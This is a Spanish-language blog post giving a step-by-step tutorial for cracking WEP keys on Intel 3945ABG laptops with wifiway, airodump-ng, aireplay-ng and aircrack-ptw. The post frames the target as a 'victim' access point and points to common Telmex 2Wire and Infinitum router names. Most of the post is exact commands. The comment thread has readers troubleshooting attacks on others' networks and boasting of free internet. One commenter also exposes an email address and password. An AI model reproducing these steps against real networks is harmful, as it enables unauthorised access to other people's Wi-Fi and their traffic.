Imperio en Llamas
Tratando de hacer este mundo mas INSEGURO

Tutorial definitivo para crackear claves WEP con ipw3945

Category: , By Jesus

Hace un tiempo les preguntaba si alguien conocía la manera de crackear claves WEP. Pues con el tiempo y con ayuda de varias personas he podido realizarlo con mi laptop Gateway con tarjeta inlambrica Intel Pro/Wireless 3945ABG. He decidido publicar los pasos que he seguido para lograrlo y espero les resulte útil.

Tutorial:

Primero, hay que bajarse esta distribución Linux: wifiway 0.4, clic en el link y en la pagina que se abre bajen el .iso, después graben la imagen en un CD.

Arrancamos el LiveCD y entramos en el modo startx.

Ok, habiendo hecho esto aquí empieza el verdadero proceso. Vamos a la carpeta:

/sys/class/net/wifi0/device/

y abrimos archivo channel. Ponemos 1, guardamos y cerramos archivo. (Problemas con este paso? Ve a las notas)

A continuación abrimos una terminal y escribimos:

airodump-ng rtap0

vamos a ver como empiezan a aparecer redes. Presionamos Ctrl + C para detener el proceso. Tomamos nota del BSSID de la red que queremos crackear. A continuación vamos a la carpeta en la que ya estábamos (device) y ahora abrimos el archivo:

BSSID
en este archivo copiamos el BSSID de la red que elegimos, lo guardamos y lo cerramos. (atención: a algunas personas les causa problemas cerrar este archivo despues de guardarlo. Prueben dejándolo abierto o también cerrándolo pero verifiquen que la BSSID quedo guardada).

Ahora empezamos a capturar paquetes con el siguiente comando:

airodump-ng -c CANAL DEL AP -w ARCHIVO GUARDA IVS rtap0

Donde:
Canal del AP: es el numero que aparece debajo de CH en la primer lista de redes que vimos.
Archivo guarda IVs: es el nombre de un archivo para que guarde todo lo capturado. Elijan el nombre.

Después de hacerlo vemos que empieza el proceso de captura de paquetes.

Vamos de nuevo a la carpeta Device y ahora abrimos el archivo rate, lo ponemos con valor 2 lo guardamos y lo cerramos.

Abrimos otra terminal y ahora necesitamos saber nuestro numero MAC de la tarjeta inalámbrica. Lo hacemos por medio de:
ifconfig wifi0 up
y luego
ifconfig
Es un numero de 12 digitos que viene etiquetado como HRDAW (o algo asi) en el apartado wifi0.

Lo que haremos ahora sera asociarnos al Access Point (red) victima utilizando el siguiente comando:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Donde:
BSSID: es el numero que elegimos al principio, el MAC del Access Point victima (12 digitos).
MAC WIFI0: es el numero MAC que acabamos de obtener de nuestra tarjeta inalámbrica.
ESSID: Es el nombre del AP victima, aparece en la terminal donde estamos capturando paquetes, es la ultima columna hasta la derecha (Los usuarios de Infinitum en México normalmente tienen: 2WIRE + un numero menor que 999 o también INFINITUM + un numero menor que 9999 ).

Cuando la autentificación y la asociación sean exitosas abrimos otra terminal y ejecutamos el siguiente comando:

aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0

BSSID: Es lo mismo que en el anterior.
MAC WIFI0: Lo mismo que en el anterior.

Hecho esto los paquetes(#Data) en la terminal donde tenemos al airodump deberán de empezar a subir para el Access Point elegido.

Esperamos a que junte un mínimo de 30,000 #Data. Cuando este por encima de ese valor, ejecutamos:

aircrack-ptw ARCHIVO GUARDA IVS.cap
Donde:
ARCHIVO GUARDA IVS: Es el nombre que dimos al principio al archivo para que guardara IV's. OJO: deberás de poner un numero que corresponde a las veces que has capturado paquetes en esta sesión. Por ejemplo, si el nombre que asignamos al archivo fue WEP y si es la primera vez que capturas paquetes en esta sesión, el nombre que usaras aquí sería: WEP-01.cap esto también lo puedes verificar en la carpeta root.

En unos instantes te deberá aparecer la clave, en el renglón que diga Found Key. Si no aparece espera a que junte mas paquetes y vuelve a ejecutar este ultimo comando. Puede llegar a requerir hasta 100,000 o mas.

Notas:
  • Prueben varios valores de channel: si no aparece ninguna red en el airodump pero sabes que debería de aparecer alguna, entonces prueba con otros valores en channel. El rango posible es entre 1 y 11. No olvides guardar el archivo cuando lo modifiques. Otra cosa con respecto a esto, lectores de México, los routers 2Wire de Infinitum de Telmex vienen normalmente en canal 6.
  • Como dije antes, hay que revisar bien que el archivo BSSID si haya guardado bien la MAC que le dimos. Los problemas que presenta cuando no la guardó es que no se autentifica con el aireplay.
  • Si no se autentifica y hemos comprobado que si guardo bien el archivo BSSID, revisa en la tabla de captura del airodump el valor de RXQ, si es bajo trata de acercarte mas al AP o conseguir mejor señal y vuelve a ejecutar el código para autentificarte.
Este tutorial es especial para las tarjetas Intel Pro/Wireless 3945ABG ya que el procedimiento común que se hace con otra, por ejemplo una Atheros, es diferente. Este tutorial puede funcionar con otras tarjetas que no sean Intel pero no lo he probado. Ademas para otras que ya son conocidas que si capturan e inyectan el proceso es mas fácil y pueden usar Backtrack. Es un gusto que por fin se pueda inyectar con las IPW3945. A disfrutar.

Dudas o sugerencias déjenlas en los comentarios, tratare de ayudarles en lo que pueda.

La información original que yo utilice para poder lograr romper una clave WEP la pueden encontrar en este link. Gracias SeguridadWireless.

 

84 comments so far.

  1. aKO 11:57 AM
    Ante todo gracias por el tuto. Por fin conseguí inyectar y sacar la WEP. Pero una vez la conseguí no consigo usarla. La clave me viene en hexadecimal, algo asi como 05: 34 56 56 C3 0E. En Windows Vista me intento conectar y me pide una clave o contraseña y la coloque como la coloque nunca es correcta. He provado tal como la he transcrito, sin esos dos puntos, con dos puntos entre los pares de números, todos los números juntos y alguna que otra posibilidad más que se ha ocurrido. Pero nada de nada. También lo intenté en decimal y en ESSID (por cierto un palabreja muy rara) pero tampoco.
    Agradecería mucho una ayudilla. He buscado por ahí (Seguridadwireless, elHacker...) pero no soy capaz de encontrar nada. Seguramente me equivoqué de camino desde el principio; no tengo ni idea. Gracias de antemano
  2. aKO 12:04 PM
    Ante todo gracias por el tutorial. Necesito un poco de ayuda. Conseguí sacar la WEP pero no consigo usarla. En Windows Vista me conecto a la red en cuestión y me pide una contraseña o clave, donde escribo la WEP que me dio el aircrack (algo asi como 03: 45 67 65 C5 78 0E) pero no resulta válida. He probado a colocarla solo con espacios entre los pares de números, con dos puntos entre ellos, todos juntos, en decimal y en ESSID, pero no lo consigo. A ver si me puedes echar una mano. Gracias.
  3. aKO 12:05 PM
    perdona por escribirte dos veces, la primera vez no me di cuenta de que tenias que aprobar los comentarios, sorry.
  4. Anónimo 7:02 PM
    Hola, yo he tratado de usar tu técnica, pero me quedo en el paso de loggearme al AP, y pues resulta que desde el principio no he podido abrir los archivos de channel, BSSID y rate, no se si sea porque no tengo una carpeta wifi0 pero pense que podía utilizar la carpeta eth0 pero no existen los archivos ni puedo crearlos, en el tutorial indicas si estos archivos no están no podré logearme, pero no se si es esto, o que mi tarjeta no puede hacerlo, podrías ayudarme? mi tarjeta es Intel(R) PRO/Wireless 2200BG Network Connection.
  5. Jesus 4:11 PM
    ako: el problema que tiene es que la clave esta codificada en hexadecimal. lo que debes hacer es decodificarla. Es fácil solo entra en este link. Los numeros que tu tienes son valores hexadecimales, lo que tienes que hacer es convertirlos a ASCII. Asi que, escribe los números que te devolvió el aircrack y usa una conversión de Hex to ASCII.

    anónimo: creo que el problema es que esta distribución esta hecha para la inyección con la Intel Pro/Wireless 3945ABG (esto no lo tengo seguro). Hace poco tuve ese problema con otra tarjeta usando el Wifiway. Pero por tener a mano mi laptop lo que hice fue usar mi tarjeta Intel. Por que no intentas con el backtrack? los pasos son similares y me atrevería a decir que son aun mas fáciles. En YouTube puedes encontrar muchos videos de crackear con backtrack. Hay uno muy bueno cuyo autor es kyokorn.
  6. Anónimo 2:45 PM
    hola!!! estoy usando el wifiway como livecd y tengo un problema que no logre solucionar, y que es simplemente que no reconoce la 3945 de mi portatil. No existe para el sistema. Llevo horas buscando y he encontrado gente con el mismo problema pero ninguna solución. creo que es simplemente porque debe de ser unos comandos sencillísimos pero la gente que controla da por asumido que la solución es obvia y no se rebaja a contestar a pesados novatos como yo. Lo digo porque el tono habítual de las contestaciones son del tipo "busca porque ya se ha contestado ya" o "busca y aprende que no es tan complicado" .... bueno que me voy por las ramas XD

    Lo más parecido que he encontrado es lo siguiente:

    rmmod ipwraw
    rmmod mac80211
    modprobe ipwraw
    modprobe mac80211 rtap_iface=1

    pero en el segundo comando no lo reconoce porque el "modulo mac80211" no existe (he probado a ponerlo de manera diferente por si las erratas.

    ... tampoco entiendo que una distribución de linux que se hace casi ex-profeso para poder trabajar con la 3945 y poder inyectar paquetes no la reconozca desde el principio... en fin

    Bueno, si alguien me puede ayudar lo agradecería... muchas gracias
  7. Anónimo 8:01 AM
    Primero gracias por este magnifico tutorial. Es de los pocos que me han ayudado algo.

    Tras seguir todos los pasos encuentro un pequeño problema en el ultimo paso. Al final aircrack encuentra la contraseña wep pero me pone lo siguiente [ 00:11:22:33:44 ] (.."3D) que debo hacer con la contraseña que me devuelve puesto que la copio y no me conecta en windows.

    He probado a convertir de hexadecimal a ascii toda la cadena anterior pero no me acepta la clave. Podeis ayudarme por favor.
  8. Jesus 12:46 PM
    Me gustaría poder ayudarte, pero nunca me había topado con esa situación. Estas seguro que ese numero lo obtuviste en el renglón que dice: Found key with length 05?? si ahí fue donde lo obtuviste, entonces la contraseña sería 0011223344 sin corchetes, puntos ni nada. Siento no poder ser de mucha ayuda, pero puedes dirigirte a los foros de Seguridad Wireless seguro ahí te pueden ayudar.
  9. Anónimo 6:45 PM
    Como arranco LiveCD y entro en Stardx
  10. Jesus 8:04 PM
    Tienes que modificar la secuencia de boot del BIOS de tu PC. Al encender tu computadora normalmente te da opciones, una de ellas entrar al bios o setup, a veces directamente te dice que presiones cierta tecla para que modifiques la secuencia de booteo. Tienes que poner que "bootee" desde el cd-rom primero y yo pondría el disco duro enseguida.
  11. kbzonmed 8:32 PM
    Hola muchas gracias por el tutorial, en donde debo ingresar el ultimo comando para que aparesca el reglon de Found key with length 05 porque tengo tres terminales abiertas una con el airodump-ng -c... que esta corriendo y no le entren programas, otra con el aireplay-ng que tambien esta corriendo y no le entran comandos y por ultimo una tercera donde se me asocie al acess point de la victima en esta si puedo seguir introduciendo comandos pero cuando junte mas de 30.000 paquetes no me aparece nada al ejecutar el aircrack solo dice aircrack 1. 0. 0. o algo asi pero nada de key... ademas yo veo que el programas captura paquetes pero no aumenta el numero de #data. Gracias por todo.
  12. kbzonmed 4:59 PM
    Hola sigo con el mismo problema, estoy seguro de haber seguido todos los pasos, pero cuando ejecuto aircrack-ptw ... en una ventana diferente a las que se encuetra corriendo el airodump y el aireplay me aparece lo siguiente

    this is aircrack-ptw 1.0.0
    for more information see http//www.cdc.informatik.tu-darmstads.de/aircrack-ptw
    **lo siguiete aparece cada linea una vez por wifi detectada por el airodump**

    allocating a new table
    bssid=(n° victima) keyindex=0

    stats for bssid (n° victima) keyindex= 0 packets=106

    **el ultimo numero aument a medida que capturo pquetes pero llevo dos horas en eso y aun no me da una contraceña.

    muchas gracias al que me pueda ayudar.
  13. Jesus 5:17 PM
    has puesto el nombre de archivo con extension .cap? ejemplo:
    aircrack-ptw capturas-01.cap
    eso te debería de arrojar resultados, pero segun leo en tu primer comentario, no estas capturando datas con el airodump, estas seguro que si estas reinyectando con el ataque 3 de aireplay-ng? si eso esta bien, entonces podría ser problema con el access point, los de buena calidad no caen ante estos tipos de ataques. Tienes idea de que marca es? El numero de paquetes capturados deberia ser mayor a 20000 para que puedas sacar la contraseña.
  14. Luis 8:55 PM
    Pfff excelente tutorial, claro y sencillo, mil gracias !!
  15. kbzonmed 9:47 PM
    todo lo que me dices lo intente y claramente logro inyectar paquetes pero el numero de la coluna data donde corre el airodump sube muy lento, entre a la paquina que me recomienda el progama y con otros comandos me dice que me falta paquetes para decodificar la clave pero he llegado a juntar mas de dos millones y nada, sigo con un numero entre 100 y 200 en la columna data del airodump, otra cosa el archivo ivs aumenta de tamaño progresivamente mientrass capturo llega a pasar hasta 64 megas y no me lanza una key, sabes como acelerar el trafico de paquetes con esta particion, sabes si esto resulta cuando solo recives una rallita de señal, o cuando me trato de colgar de un router??
    bueno desde ya muchas gracias
  16. Jesus 11:18 PM
    Te equivocas, no has juntado dos millones, los paquetes capturados son los que marca la columna #data del airodump, entonces, si solo tienes entre 100 y 200 no hay posibilidades de que puedas obtener la clave. Creo que tu problema esta en el access point, ha de ser bueno. Los paquetes capturados al parecer es parte del trafico natural en esa red. Te aconsejo que intentes hacer este proceso con otra red. A todo esto, si lo estas haciendo con una Intel Pro/Wireless 3945 vdd?
  17. kbzonmed 9:57 PM
    si ya me resulto, al parecer por lo que ey en otra pagina si uno esta muy lejos de la señal no capta los ivs, fui a la casa de un amigo y ahi logre lanzar el aircrack-ng pero lleva como 10 min haciendo calculos, ha probado millones de contraseñas con casi 500 mil ivs, pero no me sale clave, otra cosa que me llamo la atencion es que los ivs siguen subiendo mientras decodifica , hay que frenar el airodump o ewl aireplay antes de lanzar el aircrack???
  18. Jesus 10:12 PM
    No es necesario que detengas ningún proceso, mira, si estas usando wifiway cualquier versión, no es necesario que uses aircrack-ng por que ya trae incluido el aircrack-ptw, el cual requiere menos paquetes para descifrar la clave. De hecho, cuando el airodump te marque en la columna de #data 20000 ya puedes comenzar a hacer pruebas para sacar la clave.

    Algo importante, recuerda el nombre del archivo en el que le indicaste al airodump donde va a guardar los paquetes, como sabes cual es el nombre del archivo? es el que viene definido por la opción -w NOMBRE_DE_ARCHIVO. suponiendo que ponemos de nombre "wep" sin comillas, entonces en el aircrack-ptw el comando será aircrack-ptw wep-01.cap

    Fíjate que al nombre de archivo se le agrega el -01.cap, si tu hicieras otra captura en la misma sesión y con el mismo nombre de archivo, el 01 cambiaría por 02 y así sucesivamente. Al parecer estas muy cerca de lograr sacar una wep. Suerte y aquí sigo para las dudas que tengas.

    Puedes ver los archivos de capturas en la carpeta root.
  19. kbzonmed 3:21 PM
    y en cuanto al tiempo en cuanto tiempo deberia esperar que tire la clave porque igual em da un poco de mied ocuando lleva 10 minutos trabajando el procesador al 100%
  20. Jesus 3:26 PM
    Pues mira, usando aircrack-ptw (que como te dije es mas rapido que el ng), siendo una clave de 64 bits y con teniendo unos 25000 paquetes capturados por airodump a mi me tarda unos 10 segundos. No debería tardarte tanto como 10 minutos.
  21. Anónimo 5:47 PM
    HOLA.A LA HORA DE BAJARME EL PROGRAMA VEO QUE HAY TRES OPCIONES ADEMAS DE VARIAS VERSIONES.
    POR EJEMPLO EN LA VERSION 0.8 ESTAN:
    WIFIWAY-0.8ISO
    WIFIWAY-0.8ISO.MD5
    MD5SUM.TXT
    ME PODRIAS ACLARAR PARA QUE VALEN CADA UNA DE ELLAS.
    YO TENGO DE SISTEMA OPERATIVO EL VISTA PREMIUM.
    ¿QUE VERSION DE WIFIWAY ME BAJO?
    GRACIAS
  22. Anónimo 11:48 AM
    ME HE BAJADO WIFIWAY-O.8 ISO
    REINICIO EL ORDENADOR Y CON F12 ENTRO EN BOOT DECIVE ESCOJO LA OPCION CD/DVD.
    EL ORDENADOR LEE EL CD PERO ENSEGUIDA
    CARGA EL SISTEMA OPERATIVO WINDOWS VISTA PREMIUM.¿QUE ES LO QUE PASA?
    NO TENDRIA QUE QUEDARSE EN EL PROGRAMA DEL CD.SI NECESITAS MAS INFORMACION DE LO QUE ME DICE CUANDO CARGA EL CD ME LO DICES.GRACIAS
  23. Jesus 1:57 PM
    Evita escribir todo en mayusculas, en internet es de mala educación. Bueno, solo decirte que una diferencia importante de la version 0.8 con respecto a la 0.4 es un script que facilita mucho el manejo de wifiway. En unos días explicare como funciona ese script. Y sobre lo de que no arranca, lo mas probable es que no lo grabaste bien. En tu programa donde grabas los cd's debes elegir la opcion grabar imagen .iso a cd, o algo parecido. No es simplemente grabar un disco de datos y meterle el archivo .iso, puedes buscar todas las instrucciones sobre como grabar un .iso en Google
  24. Anónimo 5:16 PM
    Hola,
    decir que tutorial me ha venido muy bien y darte la enhorabuena por ello. Pero tengo un problema para obtener la wep de un AP, donde el ESSID tiene un nombre separado por espacios, y cuando ejecuto el comando da error por tener espacios el ESSID, hay alguna solucion?
  25. Jesus 5:20 PM
    Usa comillas, ejemplo: -e "Nombre de ap"
  26. Anónimo 4:04 PM
    gracias por el tutorial!! tengo un problema ya qe cuando abro sys/class/net/wifiO/device/ no encuentro ningun fichero llamado channels. e intentado saltarme este paso pero no entra en airdump-ng rtapO, pero si qe me deja entrar en airdump-ng a secas aunqe aqi no encuentro nada. si me exas una ayuda te lo agradeceria!!
  27. Tuky! 8:49 PM
    Hola! me ha parecido exelente el turorial, lo segui al pie de la letra y fué todo un exito.

    Ahora mi pregunta es, en el caso de tener un adaptador USB inalambrico...el procedimiento es el mismo???

    Podrías asesorarme si no???

    ya se que soy una desconocida, pero me encanta aprender este tipo de cosas, es un hobbie y no me importa darle al traste a mis compus.

    Saludos!
  28. Anónimo 4:48 PM
    He tenido problemas con essid,cuando pongo el nombre que aperece en la ultima columna de la derecha.Por ejemplo en el buscador de redes de windows aparece kareena,sin embargo en el terminal donde capturo paquetes
    el essid aparece como k.Poniendo el nombre completo he podido hacer la asociacion con exito.¡¡¡solucionado¡¡
    Ahora una consulta cuando utilizo el comando aireplay-ng........empiezan a subir paquetes paquets ¿es este el número
    que tiene que ser superior a 30.000? y ¿ejecutar en ese mismo terminal del aireplay-ng el aircrack?¿Aproximadamente cuanto tiempo tiene que estar ejecutandose el aireplay-ng,para sacar la clave?
    Gracias por anticipado.
    Posdata:ya escribo con minusculas
  29. Anónimo 1:47 PM
    Hola,gracias por el tutorial.He conseguido la clave y me sale:
    Found key with len 05: EE 84 7F CE D2
    Habias comentado que esta en hexadecimal,lo he convertido en ASHII
    pero me salen al convertirlo unos simbolos muy raros.¿podrias ayudarme?
  30. Jonatan 7:27 AM
    Esta muy bueno tu tuto, pero me quedo en this is aircrack-ptw 1.0.0
    for more information see http//www.cdc.informatik.tu-darmstads.de/aircrack-ptw
    **lo siguiete aparece cada linea una vez por wifi detectada por el airodump**

    allocating a new table
    bssid=(n° victima) keyindex=0

    stats for bssid (n° victima) keyindex= 0 packets=106

    que me recomiendas que haga, de ante mano gracias
  31. Jesus 12:17 PM
    anonimo que no le aparece la carpeta channels: a mi me paso eso cuando intente hacerlo en una laptop que no tenía una IPW3945, creo que ese es tu caso. No puedes usar la interfaz rtap0 por que esa solo la usa la tarjeta IPW3945.

    tuky!, tratare de seguir haciendo tutoriales con otras tarjetas, en pocos dias publicare uno con una tarjeta usb encore que es de las mas baratas y conviene tener un tuto con ellas. No te puede ayudar personalmente debido a que me falta tiempo hasta para actualizar el blog. Entra en Seguridad Wireless en la seccion del foro, seguro ahi encuentras lo que necesites.

    Anonimo que tenia problemas con essid: Solo te aparecía K por que necesitabas hacer la ventana mas ancha para que apareciera todo el nombre completo. Con respecto a lo de los paquetes: el numero que te debe preocupar es el de la columna de #data en el airodump. Para mayor certeza es mejor que sea superior a 30000. Te recomiendo seguir corriendo el aireplay y ejecutar aircrack en otra terminal esto por si los paquetes que tienes en ese momento no son suficientes y para que siga enviando mas.

    Anonimo que pregunta de la clave: Muchas veces un numero en hexadecimal se podria convertir en un caracter no imprimible por ejemplo el 13 en hexadecimal equivale a un enter, entonces.. ps como pones un enter en el campo de la clave? esto solo es conveniente para cuando una persona puso un nombre o algo asi, para tu caso usa mejor el numero de 10 digitos que te da. Debe funcionar.

    jonatan: en cada renglon te aparece packets que es lo paquetes capturados que se encuentran en el archivo .cap que le disto al aircrack, esos packets deben ser superior por lo menos a 20000, en el ejemplo que pones solo tienes 106, entonces, tu problema esta en la inyeccion de paquetes. O podrías estar equivocandote de archivo .cap
  32. pckz 9:44 PM
    grande maestro!
  33. pmeraz 1:59 PM
    Que tal, tengo una duda espero puedan ayudarme, ya he ingresado a varios 2wire en tan solo 10min con otra version de linux y commandos distintos y solo con 280,000 ivs, motinoreo, capturo e inyecto y listo en 10 minutos obtengo la clave.
    Pero bueno, el problema es que tengo que estar cerca del 2wire o bien que llegue la señal aceptable para hacerlo, mi duda es, me llega la señal baja de un 2wire, entces para amplificar esa señal si pongo yo un ap tengo quer ponerlo como bridge o como repetidor? para de tal manera hacke el que yo puse y como si fuera el otro, esto funciona o que necesitaria hacer? para que bueno hacke la señal amplificada de este como si estubiera en le otro?
    aun que bueno si yo a mi ap no le pongo clabe para probar realmente no hackere nada o si? ya que lo que quiero es entrar al 2wire
  34. Jesus 2:50 PM
    tu pregunta es muy interesante, lastima que todavia no se nada de eso. Pero te recomiendo que preguntes en Seguridad Wireless seguro ahi te pueden orientar al respecto. En realidad creo que investigare sobre eso por que tambien he querido amplificar la señal pero no habia pensado mucho en eso.
  35. Anónimo 12:02 PM
    que tal hermano, bueno el ttuto, pero tengo un problema. en el paso donde grabas en el editor de texto el canal, el bssid, y me pare que el rate tambien al momento de guardar y cerrar el editor me aparace una alerta que dice "no file to open" y pues no me deja guardar, saludos...
  36. Anónimo 4:24 PM
    Mi problema es que no me ha aparece la carpeta wifi0 en /sys/class/net. Tengo /sys/class/net/eth1/device pero en esta no tengo los archivos bssid y rate. Además no me deja modificar el channels. Le he dado permisos "chmod 777 channels" y nada me sigue diciendo: "que no tengo permisos"

    Ya arregle lo del archivo channels. He tenido que cambiar los permisos, el creador: chown (nuestro nombre de usuario) channels, y luego abrirlo en modo root: sudo vim channels.

    De todas formas no entiendo porque no tengo los archivos bssid y rate
  37. Marco 11:44 AM
    En primr lugar gracias por el tutorial. Mi problema es que no puedo acceder al modo startx porque al loguearme con el nombre indicado no me deja escribir nada en el apartado de la password. tal vez estoy poniendo mal lo primero, es decir, en el apartado wifiway login. Bueno yo pongo "root". Disculpa mi ignoracia y gracias de antemano
  38. Cristina 10:50 AM
    El autor ha eliminado esta entrada.
  39. Anónimo 10:54 AM
    como que este no es el lugar para pedir claves para gmail
  40. Cristina 10:56 AM
    hola amigos ayudenme necesito recuperar mi clave alguien me la cambio mi correo era ximes.cv@gmail.com y la clave anterior era xx1017 me la cambiaron y no puedo recibir ayudenme escribanme al correo cristi197339@gmail.com seguros de su seriedad y ayuda les agradesco de todo corazon
  41. Anónimo 11:00 AM
    esto huele a que van a empezar los hoygan, admin moderalos jajaja
  42. Gothike 3:23 AM
    Hola, he tratado de seguir tu tutorial con la tarjeta Intel 4965BG, actualmente SI me es posible ponerla en modo monitor, mas me encuentro algo atorado en lograr capturar los paquetes necesarios y asi tambien en realizar una inyección para obtener los ARP...

    Investigue un poco y segun esto con los drivers de iwlwifi4965 y el ipw-raw se puede mas no lo entendi bien para lograrlo... tendrás algo de info con lo cual me puedas ayudar a ver como lograrlo?

    Tengo en mi lap el Ubuntu Gutsy (7.10), es una HP Compaq 6710b, con la tarjeta Intel Pro/Wireless 4965BG. Te agradezco cualquier apoyo u orientacion al respecto!
    Adrián
  43. Anónimo 9:06 AM
    Hola,
    A ver si me puedes ayduar,por favor, me quedo encallado en la parte de airodump-ng -c CANAL DEL AP -w ARCHIVO GUARDA IVS rtap0
    me error y me dice que me deniega el permiso.
    gracias.
  44. Anónimo 5:24 PM
    CPL
    Hola amigos , soy nuevo en sto, baje el wifiway 0.4 pero al ejecutarlo como livecd no logro ingresar como startx, ste programa en algun momento me pide login y pass..q debo hacer??...GRACIAS.

    pd: el tutorial esta muy bueno!!!!!
  45. david40 5:09 AM
    gracias por el tutorial ya he conseguido descifrar algunas claves.
    Pero tengo dos preguntas a ver si me puedes ayudar.
    1ª Algunas veces cuando ejecuto el comando para inyectar trafico estando asociado e identificado no inyecta trafico y el nivel de rxq es alto 70 u 80 porque puede ser?
    2ª este programa tambien descifra claves de wpa-psk o solo wep
    Gracias por todo
  46. Estefania 8:17 AM
    Buenisimo el tutoral. Muchas gracias.
    Tengo un problemilla, agradeceria su ayuda. Despues de hacer todo el proceso al volver a windows xp, antes entraba en conexiones de red inalambricas y me salia una lista con las que detectaba, ahora dice: windows no puede configurar esta red inalambrica, etc y no sale ninguna red wifi. El wifiway modifica algo de mi configuracion?? Muchas gracias.
  47. Jesus 10:29 AM
    No, wifiway no cambia nada de windows. Me parece que lo que te sucede es que estas usando el software de gestion de redes inalambricas Intel, su nombre es Intel PROSet/Wireless y lo encuentras cerca del reloj de windows. Lo que debes hacer para volver a gestionar las redes con el default de windows es dar clic derecho en el icono del software intel y dar click en la opcion Usar windows para gestionar las redes inalambricas.
  48. Estefania 12:35 PM
    Muchas gracias ya e solucionado lo otro. Ahora mi problema es el siguiente, la primera vez consegui la clave de una red que teoricamente tengo poca señal segun el monitor de windows, pero ahora intento asociarme a una cuya señal es mucho mayor y sin embargo el valor rx0 es muy bajo. Como es posible que en windows reciba una señal muy alta de una red y luego con el airodump el valor rx0 sea bajo. Puesto que intento asociarme a dicha red y no lo hace.

    Gracias
  49. parry 2:25 PM
    Disculpen si mi duda es tonta pero no entiendo que imagen es la que debo grabar en un CD y tampoco se como correr LiveCD y el modo startx.
  50. Dar 12:18 PM
    pues a mi me pasa q desde windows si detecto la wifi a hackear.. y desde wifiway.. no la detecta.. piya redes pero la q quiero hackear no aparece... :S


    alguna solucion?
  51. Jesus 5:42 PM
    prueba con distintos canales, ve cambiando 1 3 5 7 9 11, probablemente aparezca asi
  52. Floppy 8:26 AM
    En primer lugar muy bueno el tuto.

    Lo probe y me funciona lok pasa ke en el pasao de direccionar trafico no se si lo hago bien ya que el "#Data" me tarda mucho en subir (y cuando digo mucho es cuestion de varias horas).
    Esto es normal ¿?¿?¿?
    Cuanto suele tardar en que suba a los 3000 #Data que indicas en el tuto¿?¿?

    Muchas gracias de antemano.

    Saludos
  53. Anónimo 2:08 AM
    COMO FUNCIONA AIRCRACK CON WINDOWS VISTA Y UNA TARJETA IPW3945
  54. Jesus 9:48 AM
    no funciona, recuerda que windows vista sucks!!
  55. Anónimo 6:03 PM
    Hola,
    Baje la iso de la versión 4, pero en mi notebook no me la lee, imagino que el kernel que usa esa versión no es compatible con mi notebook, así que estoy descargando la versión 8. ¿Estoy en lo correcto?, en un Dell XPS M1330, gracias y excelente información.
  56. Izzy 11:33 PM
    Oye man una pregunta, tienes idea de como poner una ESSID que lleva un espacio (ejemplo familia navarro) pork creo que eso es lo que me ocaciono problemas a la hora de la associacion, pork simplemente no me lo permitio,

    por lo demas funciona perfecto

    mil gracias man, SUPER TUTORIAL
  57. oto 4:31 PM
    Aqui les dejo un video muy bueno de como seguir los pasos mencionados para encontrar las claves de las inhalambricas, no se ve muy bien pero sirve.
    http://es.youtube.com/watch?v=voyvusZdcn8
  58. Anónimo 5:04 PM
    hola gran tutorial pero tengo un problema a la hora de guardar el sbbid los channel o cualquier otra cosa no me deja que puedo hacer para que me deje guardar
    lo?
    gracias y salu2
  59. noi 11:52 PM
    Hola, mi problema es que no me reconoce la red, osea la cableada, el modem no detecta la pc. que podre hacer?? mi pc es igual una Gateway y mi provedor de internet es cablevision.


    Saludos
  60. Anónimo 3:47 PM
    en donde estan las notas para los problemas del 1er paso? gracias
  61. Anónimo 7:12 PM
    excelente tuto compadre ! pregunta sirve para las claves wpa-psk?
  62. Anónimo 7:18 PM
    Excelente tutorial, ya logre sacar 2 claves de unos ap con nombre 2wire###, pero de un ap infinitum#### no he podido hacerlo, hay alguna diferencia entre estos ???

    Saludos y gracias por el tutorial.
  63. Anónimo 2:52 PM
    Buen dia q tal, tengo un problema al buscar las carpeta wifi0 en /sys/class/net, no la veo hay otras 4 (eth0, eth1, lo, wlan) no se a q se deba, tengo tmb una laptop gateway con tarjeta intel, igual q la tuya, no se si me puedas orientar un poco, use el wifiway 0.4,

    Saludos
  64. Anónimo 4:52 PM
    Saludos! yo el error lo tengo cuando intento lanzar el comando startx, sabes por q podria ser?

    Mi grafica es ATI x1400 GS, saludos!

    Gracias de antemano ;)
  65. Javier 7:20 AM
    hola muxisimas gracias!!! el tutorial esta muy bien, te comento mi problemilla, cuando lanzo el live cd se me carga todo bien hasta la contraseña que hay k introducir pongo root de login, pero luego no me deja escribir la contraseña....a que puede ser debido y como lo soluciono?? muchas gracias fiera!
  66. sara 4:13 PM
    hola
    muchas gracias por el tutorial aunque yo me he quedado en la primera linea
    me bajo el wifiway.iso y me da la opcion de grabar en un disco.
    entonces lo grabo.. pero en vez de grabarse la imagen .iso se graba un archivo comprimido.
    que puedo hacer?
    muchas gracias
  67. Joel 1:54 AM
    Te estoy eternamente agradecido por tu tutorial, ya tengo internet de nuevo gracias a ti :3
  68. M 12:06 AM
    excelente tutorial, muy buen trabajo...gracias
  69. fermin 10:50 AM
    hola primero que nada genial todo esta perfecto e logrado todo; solo un problema e capturado 100 mil # de data (ivs) y lo meto al aircrack, pero lo deje desde el dia de ayer duro aproximadamente 13 horas y media y no a encontrado nada, probo casi mil millones d ellaves y ninguna y me enfade ya despues de 13 hrs y lo quite para ver posibles soluciones, espero me puedas ayudar gracias!
  70. Cuauhtemoc 8:05 AM
    Gracias al informante de este Tutorial por compartir tu conocimiento, el problema que habia tenido es que mi laptop del inspiron 1420 trae vista, una intel 3945 y habia muy pocas esperanzas de poder crackear el wep hasta que encontre este Tutorial; Me tope con 1 solo problema en el proceso, cunado ya tenia la autenticacion y trataba de obtener el wep, me indicaba el error que jhonatan mencionaba ""this is aircrack-ptw 1.0.0
    for more information see http//www.cdc.informatik.tu-darmstads.de/aircrack-ptw"" lo que hice fue nunca detener las terminales que se ejecutaban y dejar qu juntara los paquetes por casi 5 hrs, al sacar la wep de nuevo la obtuve inmediatamente y sin necesidad de combertirla a ascii.
    De nuevo gracias.
  71. javi 5:11 AM
    hola me podeis decir si esto funciona con el vista si no es asi con que sistema funciona gracias
  72. Novato 9:40 AM
    Jesus Enhorabuena por este magnifico tutorial.

    Ha salido todo a la perfección aunque al principio ha sido un poco lio, xk el router pillaba varios canales y al final solo inyectaba en uno, pero ha sido muy rápido.

    Por cierto la clave la puse tal cual despues de los dos puntos y esa era, ni pasarla a decimal ni nada.

    Lo dicho muchas gracias!!!
  73. Scott 8:27 PM
    hola, muy bien por el tutorial, oye una pregunta este wifiway 0.4 sireve para claves WPA-PSK?, si es asi podrias publicar el tutorial para obtener esas claves o k onda como le hago en este caso
